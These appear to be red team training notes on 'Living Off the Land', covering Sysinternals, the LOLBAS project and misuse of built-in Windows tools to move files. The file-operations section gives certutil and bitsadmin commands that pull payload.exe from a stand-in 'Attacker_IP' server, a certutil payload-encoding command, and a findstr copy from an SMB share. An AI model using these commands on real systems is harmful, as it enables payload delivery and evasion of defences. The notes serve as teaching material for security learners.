## Introduction

### What is "Living Off the Land"?

Living Off the Land is a trending term in the red team community. The name is taken from real-life, living by eating the available food on the land. Similarly, adversaries and malware creators take advantage of a target computer's built-in tools and utilities. The term Living Off the Land was introduced at [DerbyCon3](https://www.youtube.com/watch?v=j-r6UonEkUw) in 2013 and has gained more traction in the red team community ever since, becoming an often used and popular technique.

These built-in tools perform various regular activities within the target system or network capabilities; however, they are increasingly used and abused, for example, using the [CertUtil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil) tool to download malicious files into the target machine.

The primary idea is to use Microsoft-signed programs, scripts, and libraries to blend in and evade defensive controls. Red teamers do not want to get detected when executing their engagement activities on the target, so utilizing these tools is safer to maintain their stealth.

The following are some categories that Living Off the Land encompasses:

- Reconnaissance
- Files operations
- Arbitrary code execution
- Lateral movement
- Security product bypass

## Windows Sysinternals

### What is Windows Sysinternals?

Windows Sysinternals is a set of tools and advanced system utilities developed to help IT professionals manage, troubleshoot, and diagnose the Windows operating system in various advanced topics.

Sysinternals Suite is divided into various categories, including:

- Disk management
- Process management
- Networking tools
- System information
- Security tools

In order to use the Windows Sysinternals tools, we need to accept the Microsoft license agreement of these tools. We can do this by passing the -accepteula argument at the command prompt or by GUI during tool execution.

The following are some popular Windows Sysinternals tools:

| Tools | Description |
| --- | --- |
| [AccessChk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) | Helps system administrators check specified access for files, directories, Registry keys, global objects, and Windows services. |
| [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) | A tool that executes programs on a remote system. |
| [ADExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) | An advanced Active Directory tool that helps to easily view and manage the AD database. |
| [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) | Monitors running processes for CPU spikes and the ability to dump memory for further analysis. |
| [ProcMon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) | An essential tool for process monitoring. |
| [TCPView](https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview) | A tool that lists all TCP and UDP connections. |
| [PsTools](https://docs.microsoft.com/en-us/sysinternals/downloads/pstools) | The first tool designed in the Sysinternals suite to help list detailed information. |
| [Portmon](https://docs.microsoft.com/en-us/sysinternals/downloads/portmon) | Monitors and displays all serial and parallel port activity on a system. |
| [Whois](https://docs.microsoft.com/en-us/sysinternals/downloads/whois) | Provides information for a specified domain name or IP address. |

For more information about the Sysinternals suite, you can visit the tools' web page on Microsoft Docs [here](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite).

### Sysinternals Live

One of the great features of Windows Sysinternals is that there is no installation required.

Microsoft provides a Windows Sysinternals service, Sysinternals live, with various ways to use and execute the tools. We can access and use them through:

- Web browser ([link](https://live.sysinternals.com/)).
- Windows Share
- Command prompt

In order to use these tools, you either download them or by entering the Sysinternal Live path `\\\live.sysinternals.com\\tools` into Windows Explorer.
![23597249e4d0510395f9c1fcde2e4205.png](../img/23597249e4d0510395f9c1fcde2e4205.png)

### Red Team utilization and benefits

built-in and Sysinternals tools are helpful for system administrators, these tools are also used by hackers, malware, and pentesters due to the inherent trust they have within the operating system. This trust is beneficial to Red teamers, who do not want to get detected or caught by any security control on the target system. Therefore, these tools have been used to evade detection and other blue team controls.

Remember that due to the increase of adversaries and malware creators using these tools nowadays, the blue team is aware of the malicious usage and has implemented defensive controls against most of them.

## LOLBAS Project

### What is LOLBAS?

LOLBAS stands for **L**iving **O**ff the **L**and **B**inaries **A**nd **S**cripts, a project's primary main goal is to gather and document the Microsoft-signed and built-in tools used as Living Off the Land techniques, including binaries, scripts, and libraries.
![9d7af06f0e8bb994df667dc2743ec303.png](../img/9d7af06f0e8bb994df667dc2743ec303.png)

The LOLBAS project is a community-driven repository gathering a collection of binaries, scripts, libraries that could be used for red team purposes. It allows to search based on binaries, functions, scripts, and ATT&CK info. The previous image shows what the LOLBAS project page looks like at this time. If you are interested in more details about the project, you may visit the project's website [here](https://lolbas-project.github.io/).

The LOLBAS website provides a convenient search bar to query all available data. It is straightforward to look for a binary; including the binary name will show the result. However, if we want to look for a specific function, we require providing a `/` before the function name. For example, if we are looking for all execute functions, we should use `/execute`. Similarly, in order to look based on types, we should use the `#` symbol followed by the type name. The following are the types included in the project:

- Script
- Binary
- Libraries
- OtherMSBinaries

### Tools Criteria

Specific criteria are required for a tool to be a "Living Off the Land" technique and accepted as part of the LOLBAS project:

- Microsoft-signed file native to the OS or downloaded from Microsoft.
- Having additional interesting unintended functionality not covered by known use cases.
- Benefits an APT (Advanced Persistent Threat) or Red Team engagement.

Please note that if you find an exciting binary that adheres to the previously mentioned criteria, you may submit your finding by visiting the [GitHub repo contribution page](https://github.com/LOLBAS-Project/LOLBAS#criteria) for more information.

### Interesting Functionalities

The LOLBAS project accepts tool submissions that fit one of the following functionalities:

- Arbitrary code execution
- File operations, including downloading, uploading, and copying files.
- Compiling code
- Persistence, including hiding data in Alternate Data Streams (ADS) or executing at logon.
- UAC bypass
- Dumping process memory
- DLL injection

## File Operations

### Certutil

Certutil is a Windows built-in utility for handling certification services. It is used to dump and display Certification Authority (CA) configuration information and other CA components. Therefore, the tool's normal use is to retrieve certificate information. However, people found that certutil.exe could transfer and encode files unrelated to certification services. The MITRE ATT&CK framework identifies this technique as **Ingress tool transfer** ([T1105](https://attack.mitre.org/techniques/T1105/)).

To illustrate this with an example, we can use `certutil.exe` to download a file from an attacker's web server and store it in the Window's temporary folder, using the command below. Note that we use the `-urlcache` and `-split -f` parameters to enforce the tool to download from the provided URL using the split technique.

```cmd
certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\Windows\Temp\payload.exe
```

- `-urlcache` to display URL, enables the URL option to use in the command
- `-split -f` to split and force fetching files from the provided URL.

Also, the `certutil.exe` can be used as an encoding tool where we can encode files and decode the content of files. ATT&CK [T1027](https://attack.mitre.org/techniques/T1027/) refers to this technique to obfuscate files to make them difficult to discover or analyze.

```cmd
C:\Users\thm> certutil -encode payload.exe Encoded-payload.txt
```

For more information about the tool, you may visit the Microsoft Document here: [Microsoft Docs: CertUtil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil)

### BITSAdmin

The `bitsadmin` tool is a system administrator utility that can be used to create, download or upload Background Intelligent Transfer Service (BITS) jobs and check their progress. [BITS](https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) is a low-bandwidth and asynchronous method to download and upload files from HTTP webservers and SMB servers. Additional information about the `bitsadmin` tool can be found at [Microsoft Docs](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin).

Attackers may abuse the BITS jobs to download and execute a malicious payload in a compromised machine. For more information about this technique, you may visit the ATT&CK [T1197](https://attack.mitre.org/techniques/T1197/) page.

```cmd
C:\Users\thm>bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe
```

- `/Transfer` to use the transfer option
- `/Download` we are specifying transfer using download type
- `/Priority` we are setting the priority of the job to be running in the foreground

For more information about the `bitsadmin` parameters, you can visit the [Microsoft documentation](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-transfer) of the tool.

## FindStr

[Findstr](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/findstr) [](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/findstr)is a Microsoft built-in tool used to find text and string patterns in files. The findstr tool is useful in that helps users and system administrators to search within files or parsed output. For example, if we want to check whether port 8080 is open on our machine, then we can pipe the result of netstat to find that port as follows: `netstat -an| findstr "445"`.

However, an unintended way was found by using `findstr.exe` to download remote files from SMB shared folders within the network as follows,

```cmd
C:\Users\thm>findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe
```

- `/V` to print out the lines that don't contain the string provided.
- `dummystring` the text to be searched for; in this case, we provide a string that must not be found in a file.
- `> c:\Windows\Temp\test.exe` redirect the output to a file on the target machine.

Note that other tools can be used for the file operation. We suggest visiting the [LOLBAS](https://lolbas-project.github.io/) [](https://lolbas-project.github.io/) project to check them out.

## File Execution 
